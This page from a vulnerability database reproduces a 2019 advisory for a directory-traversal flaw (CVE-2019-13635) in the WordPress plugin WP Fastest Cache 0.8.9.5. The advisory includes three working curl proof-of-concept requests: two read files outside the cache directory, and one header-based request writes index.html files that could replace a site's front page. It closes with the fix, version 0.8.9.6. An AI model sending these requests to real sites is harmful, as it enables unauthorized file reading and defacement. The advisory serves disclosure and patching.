Lucene search
K

WordPress WP Fastest Cache 0.8.9.5 Directory Traversal

🗓️ 30 Jul 2019 00:00:00Reported by Imre RadType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 285 Views

WordPress WP Fastest Cache 0.8.9.5 Directory Traversal vulnerabilit

Related
Code
ReporterTitlePublishedViews
Family
CNVD
WordPress WP Fastest Cache Path Traversal Vulnerability
31 Jul 201900:00
cnvd
CVE
CVE-2019-13635
30 Jul 201912:20
cve
Cvelist
CVE-2019-13635
30 Jul 201912:20
cvelist
EUVD
EUVD-2019-5063
7 Oct 202500:30
euvd
NVD
CVE-2019-13635
30 Jul 201913:15
nvd
OpenVAS
WordPress Fastest Cache Plugin < 0.8.9.6 Directory Traversal Vulnerability
1 Aug 201900:00
openvas
Patchstack
WordPress WP Fastest Cache plugin <= 0.8.9.5 - Directory Traversal vulnerability
14 Aug 201900:00
patchstack
Prion
Directory traversal
30 Jul 201913:15
prion
RedhatCVE
CVE-2019-13635
22 May 202510:06
redhatcve
WPVulnDB
WP Fastest Cache <= 0.8.9.5 - Directory Traversal
28 Jul 201900:00
wpvulndb
Rows per page
`WP Fastest Cache is a Wordpress plugin that creates static html files  
from the dynamic WordPress blog in order to speed up operation.  
  
Version 0.8.9.5 and below of the plugin was identified being  
vulnerable to directory traversal attacks.  
  
The first two are Windows only, the 3rd one is generic. The Windows  
specific ones were tested on WampServer (so with Apache's Httpd).  
  
#1:  
The impact is reading files outside of the cache directory. The  
attacker has control over the directory only, the file is selected as  
the first hit of the scandir results in descending order.  
  
  
curl --path-as-is http://vulnerable-host.tld/wpfc-minified/..\..\..\/stuff.php  
  
<?php  
/**  
* XML-RPC protocol support for WordPress  
*  
* @package WordPress  
*/  
...  
  
#2:  
The cacheFilePath construction logic in cache.php can be abused to  
mount a similar attack as vuln #1 and read index.html files outside  
the cache directory:  
  
curl --path-as-is http://vulnerable-host.tld/..\..\..\/whatever.html\/..  
some html content outside the cache directory  
<!-- via php -->  
  
  
#3:  
If the Google Translate plugin is active on the victim system then it  
is also possible to create index.html files outside the cache  
directory:  
  
curl -v --header "X-GT-LANG: ../../../.."  
http://vulnerable-host.tld/some-article/  
  
In configurations where the html extension has higher precedence over  
php in the webserver's DirectoryIndex configuration, this could  
actually change the front page of the victim website.  
  
  
Remediation: update to plugin version 0.8.9.6  
  
Imre  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

30 Jul 2019 00:00Current
0.1Low risk
Vulners AI Score0.1
EPSS0.03202
285